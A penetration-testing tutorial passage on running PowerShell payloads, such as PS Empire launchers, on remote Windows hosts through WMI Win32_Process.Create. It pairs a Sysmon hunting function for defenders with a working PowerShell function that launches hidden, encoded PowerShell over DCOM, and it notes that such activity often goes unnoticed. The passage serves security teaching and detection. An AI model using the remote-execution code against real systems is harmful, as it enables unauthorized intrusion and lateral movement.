Escalation with WMIC and PS Empire

Let's get the basic definitions out of the way. WMIC stands for Windows Management Instrumentation Command-line; it is the command-line front end to WMI. WMI is the Windows infrastructure for operations and management data. In addition to providing management data to other parts of Windows and to other products altogether, it lets you automate administrative tasks both locally and remotely with WMI scripts and applications. Administrators usually reach this interface through PowerShell, and Microsoft has deprecated wmic.exe in favor of the PowerShell CIM cmdlets (Get-CimInstance, Invoke-CimMethod); on Windows 11 24H2 and later it ships only as an optional Feature on Demand, so expect to fall back to PowerShell on newer targets. Like all the other topics in this book, a proper treatment of all the power available to you via WMIC is out of scope for this discussion. There are great resources online and in bookstores for the curious reader.

For now, we're interested in the remote administration I just mentioned. There are a couple of important facts for us to consider as pen testers:

  • WMIC commands fired off at the command line drop no files on the target: the payload lives in the command line and in memory. They are not invisible, though. Process creation auditing (Security event 4688 with command-line logging, or Sysmon event 1) records the spawned process, whose parent is the WMI provider host WmiPrvSE.exe, and the WMI-Activity event channels can record the WMI side. Many organizations never forward or review these logs, so WMI is another Windows feature that tends to fly under the radar.
  • In almost any Windows environment, WMI and PowerShell are not blocked outright, because administrators and management tooling depend on them. They can be constrained (PowerShell Constrained Language Mode, AppLocker or WDAC policies, host firewalls that close DCOM/RPC and WinRM to everything but management hosts), but they are rarely removed.
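
The first point above is the defender's opening, so here is the check a blue team would run. This is an added example, not code from the book: a PowerShell hunt over the Sysmon operational log for processes whose parent is WmiPrvSE.exe, which is exactly what a remote Win32_Process.Create call produces. It assumes Sysmon is installed with process creation logging (event ID 1); the computer name and event limit are parameters you would adjust.

```powershell
# Added example (not from the book): hunt for processes spawned through WMI.
# A remote "wmic ... process call create" (Win32_Process.Create) starts the new
# process under the WMI provider host, so its parent image is WmiPrvSE.exe.
# Assumes Sysmon with process-creation logging (Event ID 1) on the queried host.

function Find-WmiSpawnedProcess {
    param(
        [string] $ComputerName = $env:COMPUTERNAME,   # host whose log to read
        [int]    $MaxEvents    = 5000                 # newest N events to inspect
    )

    Get-WinEvent -ComputerName $ComputerName -MaxEvents $MaxEvents -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'
        Id      = 1
    } | ForEach-Object {
        # Sysmon puts its fields in EventData/Data elements keyed by Name.
        $xml  = [xml] $_.ToXml()
        $data = @{}
        foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }

        if ($data.ParentImage -like '*\WmiPrvSE.exe') {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Computer    = $_.MachineName
                User        = $data.User
                Image       = $data.Image
                CommandLine = $data.CommandLine
            }
        }
    }
}

# Narrow to the pattern this section is about: PowerShell launched via WMI with
# an encoded command (-e, -ec, -enc, -EncodedCommand all work, followed by base64).
Find-WmiSpawnedProcess |
    Where-Object {
        $_.Image -like '*\powershell.exe' -and
        $_.CommandLine -match '(?i)\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}'
    } |
    Format-Table Time, Computer, User, CommandLine -AutoSize
```

Without Sysmon, the same parent/child relationship is available from Security event 4688 once "Include command line in process creation events" is enabled in audit policy; the creator process field there plays the role of ParentImage. Legitimate SCCM and monitoring agents also spawn children of WmiPrvSE.exe, so the encoded-command filter is what separates this from background noise.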

Bringing this together gives us the key realization: we can use WMIC to remotely administer a Windows host, calling the Create method of the Win32_Process class over DCOM to launch powershell.exe on the target, so that our PowerShell payload (a PS Empire launcher, for instance) runs under the target's own PowerShell.
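The following is an added example, not the book's code and not part of the Empire project: the remote Win32_Process.Create technique described above, written as a PowerShell function so that the encoding step, the DCOM session and the return-code check are all visible, with the equivalent wmic.exe one-liner in a comment. The target name, the credential prompt and the sample command are placeholders; it assumes you already hold local administrator rights on the target and that TCP 135 plus the dynamic RPC range are reachable, which is the same path wmic.exe uses.

```powershell
# Added example (not from the book or the Empire project): launch PowerShell on a
# remote host through WMI, the same call "wmic process call create" makes.
# Assumptions: $Target, $Credential and $Command are placeholders supplied by the
# operator, who already has local admin on the target; DCOM (TCP 135 + dynamic
# RPC ports) is reachable. Tested shape: Windows PowerShell 5.1 CIM cmdlets.

function Invoke-WmiPowerShell {
    param(
        [Parameter(Mandatory)] [string]        $Target,      # assumed hostname or IP
        [Parameter(Mandatory)] [string]        $Command,     # PowerShell to run on $Target
        [Parameter(Mandatory)] [pscredential]  $Credential   # local admin on $Target
    )

    # powershell.exe -EncodedCommand expects base64 of the UTF-16LE script, not UTF-8.
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
    $cmdLine = "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand $encoded"

    # wmic.exe equivalent (deprecated, but the form most write-ups show):
    #   wmic /node:<target> /user:<domain\user> /password:<pass> process call create "<cmdLine>"
    $opt     = New-CimSessionOption -Protocol Dcom
    $session = New-CimSession -ComputerName $Target -Credential $Credential -SessionOption $opt
    try {
        $r = Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create `
                              -Arguments @{ CommandLine = $cmdLine }
    } finally {
        Remove-CimSession $session
    }

    # Win32_Process.Create return codes: 0 ok, 2 access denied, 3 insufficient
    # privilege, 8 unknown failure, 9 path not found, 21 invalid parameter.
    if ($r.ReturnValue -ne 0) {
        throw "Win32_Process.Create on $Target failed with ReturnValue $($r.ReturnValue)"
    }

    # The new process runs as a child of WmiPrvSE.exe on the target; only its PID
    # comes back, so the payload itself must phone home (as an Empire stager does).
    [pscustomobject]@{ Target = $Target; ProcessId = $r.ProcessId; CommandLine = $cmdLine }
}

# Usage with a placeholder host and a harmless command that leaves a file to confirm execution:
# $cred = Get-Credential -Message 'Local admin on the target (use TARGET\user or .\user for a local account)'
# Invoke-WmiPowerShell -Target 'WS01.corp.local' -Credential $cred `
#     -Command 'hostname | Out-File C:\Windows\Temp\wmi-test.txt'
```

Two practical notes. Empire's generated launcher is already a complete powershell.exe -enc one-liner; wrapping it in $Command works (PowerShell starting PowerShell) but doubles the encoding, so for a real launcher pass it as the CommandLine directly. And because nothing is returned beyond the PID, a failed payload looks identical to a successful one from this end: ReturnValue 0 only tells you that powershell.exe started.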
